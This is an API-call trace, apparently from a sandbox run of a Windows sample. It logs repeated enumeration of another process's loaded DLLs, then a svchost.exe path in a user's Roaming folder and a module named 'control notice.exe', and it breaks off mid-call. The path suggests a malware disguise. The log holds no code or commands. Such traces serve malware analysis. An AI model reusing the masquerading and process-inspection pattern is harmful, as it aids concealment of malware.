[0063.630] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff690000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0063.631] CoTaskMemFree (pv=0xd91940) [0063.631] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefdb50000, lpmodinfo=0x243b1a0, cb=0x18 | out: lpmodinfo=0x243b1a0*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0063.632] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.632] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefdb50000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0063.633] CoTaskMemFree (pv=0xd91940) [0063.633] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.633] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefdb50000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0063.634] CoTaskMemFree (pv=0xd91940) [0063.634] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefdf90000, lpmodinfo=0x243d360, cb=0x18 | out: lpmodinfo=0x243d360*(lpBaseOfDll=0x7fefdf90000, SizeOfImage=0xd7000, EntryPoint=0x7fefdf93274)) returned 1 [0063.635] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.635] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefdf90000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0063.637] CoTaskMemFree (pv=0xd91940) [0063.637] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.637] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefdf90000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\OLEAUT32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")) returned 0x20 [0063.638] CoTaskMemFree (pv=0xd91940) [0063.638] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff400000, lpmodinfo=0x243f530, cb=0x18 | out: lpmodinfo=0x243f530*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0063.639] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.639] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff400000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0063.641] CoTaskMemFree (pv=0xd91940) [0063.641] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.641] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff400000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.DLL" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0063.642] CoTaskMemFree (pv=0xd91940) [0063.642] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff9d0000, lpmodinfo=0x24416f0, cb=0x18 | out: lpmodinfo=0x24416f0*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0063.643] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.643] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff9d0000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0063.645] CoTaskMemFree (pv=0xd91940) [0063.645] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.645] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff9d0000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0063.646] CoTaskMemFree (pv=0xd91940) [0063.646] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd670000, lpmodinfo=0x24438b0, cb=0x18 | out: lpmodinfo=0x24438b0*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0063.648] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.648] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd670000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0063.649] CoTaskMemFree (pv=0xd91940) [0063.649] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.649] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd670000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0063.651] CoTaskMemFree (pv=0xd91940) [0063.651] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefee80000, lpmodinfo=0x2445a80, cb=0x18 | out: lpmodinfo=0x2445a80*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0063.652] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.652] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefee80000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0063.654] CoTaskMemFree (pv=0xd91940) [0063.654] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.654] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefee80000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0063.655] CoTaskMemFree (pv=0xd91940) [0063.655] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff430000, lpmodinfo=0x2447c40, cb=0x18 | out: lpmodinfo=0x2447c40*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0063.657] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.657] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff430000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0063.658] CoTaskMemFree (pv=0xd91940) [0063.659] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.659] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff430000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0063.660] CoTaskMemFree (pv=0xd91940) [0063.660] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefc0d0000, lpmodinfo=0x2449f28, cb=0x18 | out: lpmodinfo=0x2449f28*(lpBaseOfDll=0x7fefc0d0000, SizeOfImage=0x56000, EntryPoint=0x7fefc0dbbc0)) returned 1 [0063.662] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.662] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefc0d0000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="uxtheme.dll") returned 0xb [0063.663] CoTaskMemFree (pv=0xd91940) [0063.663] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.663] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefc0d0000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")) returned 0x1f [0063.665] CoTaskMemFree (pv=0xd91940) [0063.665] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefbca0000, lpmodinfo=0x244c100, cb=0x18 | out: lpmodinfo=0x244c100*(lpBaseOfDll=0x7fefbca0000, SizeOfImage=0x18000, EntryPoint=0x7fefbca1130)) returned 1 [0063.683] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.683] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefbca0000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="dwmapi.dll") returned 0xa [0063.684] CoTaskMemFree (pv=0xd91940) [0063.684] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.684] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefbca0000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")) returned 0x1e [0063.686] CoTaskMemFree (pv=0xd91940) [0063.686] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff360000, lpmodinfo=0x244e2c0, cb=0x18 | out: lpmodinfo=0x244e2c0*(lpBaseOfDll=0x7feff360000, SizeOfImage=0x99000, EntryPoint=0x7feff361c10)) returned 1 [0063.688] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.688] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff360000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="CLBCatQ.DLL") returned 0xb [0063.689] CoTaskMemFree (pv=0xd91940) [0063.689] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.689] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff360000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CLBCatQ.DLL" (normalized: "c:\\windows\\system32\\clbcatq.dll")) returned 0x1f [0063.691] CoTaskMemFree (pv=0xd91940) [0063.691] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefa950000, lpmodinfo=0x2450480, cb=0x18 | out: lpmodinfo=0x2450480*(lpBaseOfDll=0x7fefa950000, SizeOfImage=0xb000, EntryPoint=0x7fefa9548d8)) returned 1 [0063.693] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.693] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefa950000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="HotStartUserAgent.dll") returned 0x15 [0063.694] CoTaskMemFree (pv=0xd91940) [0063.694] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.695] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefa950000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\HotStartUserAgent.dll" (normalized: "c:\\windows\\system32\\hotstartuseragent.dll")) returned 0x29 [0063.697] CoTaskMemFree (pv=0xd91940) [0063.697] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefa890000, lpmodinfo=0x2452670, cb=0x18 | out: lpmodinfo=0x2452670*(lpBaseOfDll=0x7fefa890000, SizeOfImage=0xb000, EntryPoint=0x7fefa891290)) returned 1 [0063.699] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.699] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefa890000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="MsCtfMonitor.dll") returned 0x10 [0063.700] CoTaskMemFree (pv=0xd91940) [0063.700] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.700] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefa890000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MsCtfMonitor.dll" (normalized: "c:\\windows\\system32\\msctfmonitor.dll")) returned 0x24 [0063.702] CoTaskMemFree (pv=0xd91940) [0063.702] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefa850000, lpmodinfo=0x2454850, cb=0x18 | out: lpmodinfo=0x2454850*(lpBaseOfDll=0x7fefa850000, SizeOfImage=0x3d000, EntryPoint=0x7fefa851bdc)) returned 1 [0063.704] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.704] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefa850000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="MSUTB.dll") returned 0x9 [0063.706] CoTaskMemFree (pv=0xd91940) [0063.706] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.706] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefa850000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSUTB.dll" (normalized: "c:\\windows\\system32\\msutb.dll")) returned 0x1d [0063.708] CoTaskMemFree (pv=0xd91940) [0063.708] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd720000, lpmodinfo=0x2456a10, cb=0x18 | out: lpmodinfo=0x2456a10*(lpBaseOfDll=0x7fefd720000, SizeOfImage=0x3d000, EntryPoint=0x7fefd7218f4)) returned 1 [0063.710] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.710] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd720000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="WINSTA.dll") returned 0xa [0063.711] CoTaskMemFree (pv=0xd91940) [0063.712] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.712] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd720000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINSTA.dll" (normalized: "c:\\windows\\system32\\winsta.dll")) returned 0x1e [0063.714] CoTaskMemFree (pv=0xd91940) [0063.714] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefbb00000, lpmodinfo=0x2458bd0, cb=0x18 | out: lpmodinfo=0x2458bd0*(lpBaseOfDll=0x7fefbb00000, SizeOfImage=0x11000, EntryPoint=0x7fefbb01070)) returned 1 [0063.716] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.716] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefbb00000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="WTSAPI32.dll") returned 0xc [0063.718] CoTaskMemFree (pv=0xd91940) [0063.718] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.718] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefbb00000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WTSAPI32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")) returned 0x20 [0063.720] CoTaskMemFree (pv=0xd91940) [0063.720] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefa830000, lpmodinfo=0x245ada0, cb=0x18 | out: lpmodinfo=0x245ada0*(lpBaseOfDll=0x7fefa830000, SizeOfImage=0x18000, EntryPoint=0x7fefa831630)) returned 1 [0063.722] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.722] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefa830000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="PlaySndSrv.dll") returned 0xe [0063.724] CoTaskMemFree (pv=0xd91940) [0063.724] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.724] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefa830000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\PlaySndSrv.dll" (normalized: "c:\\windows\\system32\\playsndsrv.dll")) returned 0x22 [0063.726] CoTaskMemFree (pv=0xd91940) [0063.726] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb320000, lpmodinfo=0x245cf70, cb=0x18 | out: lpmodinfo=0x245cf70*(lpBaseOfDll=0x7fefb320000, SizeOfImage=0xb000, EntryPoint=0x7fefb324f8c)) returned 1 [0063.728] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.728] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb320000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="slc.dll") returned 0x7 [0063.778] CoTaskMemFree (pv=0xd91940) [0063.778] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.778] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb320000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll")) returned 0x1b [0063.780] CoTaskMemFree (pv=0xd91940) [0063.780] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd760000, lpmodinfo=0x245f120, cb=0x18 | out: lpmodinfo=0x245f120*(lpBaseOfDll=0x7fefd760000, SizeOfImage=0x14000, EntryPoint=0x7fefd7610e0)) returned 1 [0063.782] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.782] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd760000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="RpcRtRemote.dll") returned 0xf [0063.784] CoTaskMemFree (pv=0xd91940) [0063.784] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.784] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd760000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")) returned 0x23 [0063.786] CoTaskMemFree (pv=0xd91940) [0063.786] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef92d0000, lpmodinfo=0x24612f0, cb=0x18 | out: lpmodinfo=0x24612f0*(lpBaseOfDll=0x7fef92d0000, SizeOfImage=0xe000, EntryPoint=0x7fef92d5d28)) returned 1 [0063.788] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.788] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef92d0000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="dimsjob.dll") returned 0xb [0063.791] CoTaskMemFree (pv=0xd91940) [0063.791] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.791] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef92d0000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dimsjob.dll" (normalized: "c:\\windows\\system32\\dimsjob.dll")) returned 0x1f [0063.793] CoTaskMemFree (pv=0xd91940) [0063.793] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff2d0000, lpmodinfo=0x24634b0, cb=0x18 | out: lpmodinfo=0x24634b0*(lpBaseOfDll=0x7feff2d0000, SizeOfImage=0x71000, EntryPoint=0x7feff2e1e20)) returned 1 [0063.795] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.795] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff2d0000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0063.798] CoTaskMemFree (pv=0xd91940) [0063.798] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.798] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff2d0000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SHLWAPI.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0063.800] CoTaskMemFree (pv=0xd91940) [0063.800] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb4e0000, lpmodinfo=0x2465670, cb=0x18 | out: lpmodinfo=0x2465670*(lpBaseOfDll=0x7fefb4e0000, SizeOfImage=0x127000, EntryPoint=0x7fefb4e10ec)) returned 1 [0063.802] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.802] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb4e0000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="taskschd.dll") returned 0xc [0063.805] CoTaskMemFree (pv=0xd91940) [0063.805] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.805] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb4e0000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll")) returned 0x20 [0063.808] CoTaskMemFree (pv=0xd91940) [0063.808] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd640000, lpmodinfo=0x2467840, cb=0x18 | out: lpmodinfo=0x2467840*(lpBaseOfDll=0x7fefd640000, SizeOfImage=0x25000, EntryPoint=0x7fefd649658)) returned 1 [0063.810] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.810] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd640000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0063.813] CoTaskMemFree (pv=0xd91940) [0063.813] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.813] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd640000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SspiCli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")) returned 0x1f [0063.815] CoTaskMemFree (pv=0xd91940) [0063.815] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef97b0000, lpmodinfo=0x2469a00, cb=0x18 | out: lpmodinfo=0x2469a00*(lpBaseOfDll=0x7fef97b0000, SizeOfImage=0x74000, EntryPoint=0x7fef97b66f0)) returned 1 [0063.818] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.818] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef97b0000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="netprofm.dll") returned 0xc [0063.820] CoTaskMemFree (pv=0xd91940) [0063.820] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.820] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef97b0000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll")) returned 0x20 [0063.886] CoTaskMemFree (pv=0xd91940) [0063.886] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff9c0000, lpmodinfo=0x246bde8, cb=0x18 | out: lpmodinfo=0x246bde8*(lpBaseOfDll=0x7feff9c0000, SizeOfImage=0x8000, EntryPoint=0x7feff9c1504)) returned 1 [0063.889] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.889] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff9c0000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0063.892] CoTaskMemFree (pv=0xd91940) [0063.892] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.892] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff9c0000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NSI.dll" (normalized: "c:\\windows\\system32\\nsi.dll")) returned 0x1b [0063.894] CoTaskMemFree (pv=0xd91940) [0063.894] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb3f0000, lpmodinfo=0x246df98, cb=0x18 | out: lpmodinfo=0x246df98*(lpBaseOfDll=0x7fefb3f0000, SizeOfImage=0x15000, EntryPoint=0x7fefb3f60d8)) returned 1 [0063.897] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.897] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb3f0000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="nlaapi.dll") returned 0xa [0063.899] CoTaskMemFree (pv=0xd91940) [0063.899] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.899] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb3f0000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")) returned 0x1e [0063.902] CoTaskMemFree (pv=0xd91940) [0063.902] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd070000, lpmodinfo=0x2470170, cb=0x18 | out: lpmodinfo=0x2470170*(lpBaseOfDll=0x7fefd070000, SizeOfImage=0x18000, EntryPoint=0x7fefd073b48)) returned 1 [0063.905] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.905] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd070000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0063.907] CoTaskMemFree (pv=0xd91940) [0063.907] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.908] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd070000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTSP.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")) returned 0x1f [0063.911] CoTaskMemFree (pv=0xd91940) [0063.911] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcd70000, lpmodinfo=0x2472330, cb=0x18 | out: lpmodinfo=0x2472330*(lpBaseOfDll=0x7fefcd70000, SizeOfImage=0x47000, EntryPoint=0x7fefcd71064)) returned 1 [0063.913] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.913] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcd70000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0063.916] CoTaskMemFree (pv=0xd91940) [0063.916] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.916] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcd70000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")) returned 0x1e [0063.919] CoTaskMemFree (pv=0xd91940) [0063.919] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefa5d0000, lpmodinfo=0x24744f0, cb=0x18 | out: lpmodinfo=0x24744f0*(lpBaseOfDll=0x7fefa5d0000, SizeOfImage=0xc000, EntryPoint=0x7fefa5d602c)) returned 1 [0063.921] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.921] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefa5d0000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="npmproxy.dll") returned 0xc [0063.924] CoTaskMemFree (pv=0xd91940) [0063.924] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.924] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefa5d0000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")) returned 0x20 [0063.927] CoTaskMemFree (pv=0xd91940) [0063.927] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb330000, lpmodinfo=0x24766c0, cb=0x18 | out: lpmodinfo=0x24766c0*(lpBaseOfDll=0x7fefb330000, SizeOfImage=0xc000, EntryPoint=0x7fefb3315d8)) returned 1 [0063.930] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.930] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb330000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="dsrole.dll") returned 0xa [0063.983] CoTaskMemFree (pv=0xd91940) [0063.983] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.983] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb330000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll")) returned 0x1e [0063.986] CoTaskMemFree (pv=0xd91940) [0063.986] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9230000, lpmodinfo=0x2478880, cb=0x18 | out: lpmodinfo=0x2478880*(lpBaseOfDll=0x7fef9230000, SizeOfImage=0x3b000, EntryPoint=0x7fef92322f0)) returned 1 [0063.989] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.989] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9230000, lpBaseName=0xd91940, nSize=0x800 | out: lpBaseName="WINMM.dll") returned 0x9 [0063.992] CoTaskMemFree (pv=0xd91940) [0063.992] CoTaskMemAlloc (cb=0x804) returned 0xd91940 [0063.992] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9230000, lpFilename=0xd91940, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINMM.dll" (normalized: "c:\\windows\\system32\\winmm.dll")) returned 0x1d [0063.996] CoTaskMemFree (pv=0xd91940) [0063.996] CloseHandle (hObject=0x214) returned 1 [0064.003] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0064.003] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x92c) returned 0x214 [0064.004] EnumProcessModules (in: hProcess=0x214, lphModule=0x247bb40, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x247bb40, lpcbNeeded=0x23ee40) returned 1 [0064.004] GetModuleInformation (in: hProcess=0x214, hModule=0xad0000, lpmodinfo=0x247bdb0, cb=0x18 | out: lpmodinfo=0x247bdb0*(lpBaseOfDll=0xad0000, SizeOfImage=0x17000, EntryPoint=0xad14a1)) returned 1 [0064.005] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.005] GetModuleBaseNameW (in: hProcess=0x214, hModule=0xad0000, lpBaseName=0xd91760, nSize=0x800 | out: lpBaseName="control notice.exe") returned 0x12 [0064.005] CoTaskMemFree (pv=0xd91760) [0064.005] CoTaskMemAlloc (cb=0x804) returned 0xd91760 [0064.005] GetModuleFileNameExW (in: hProcess=0x214, 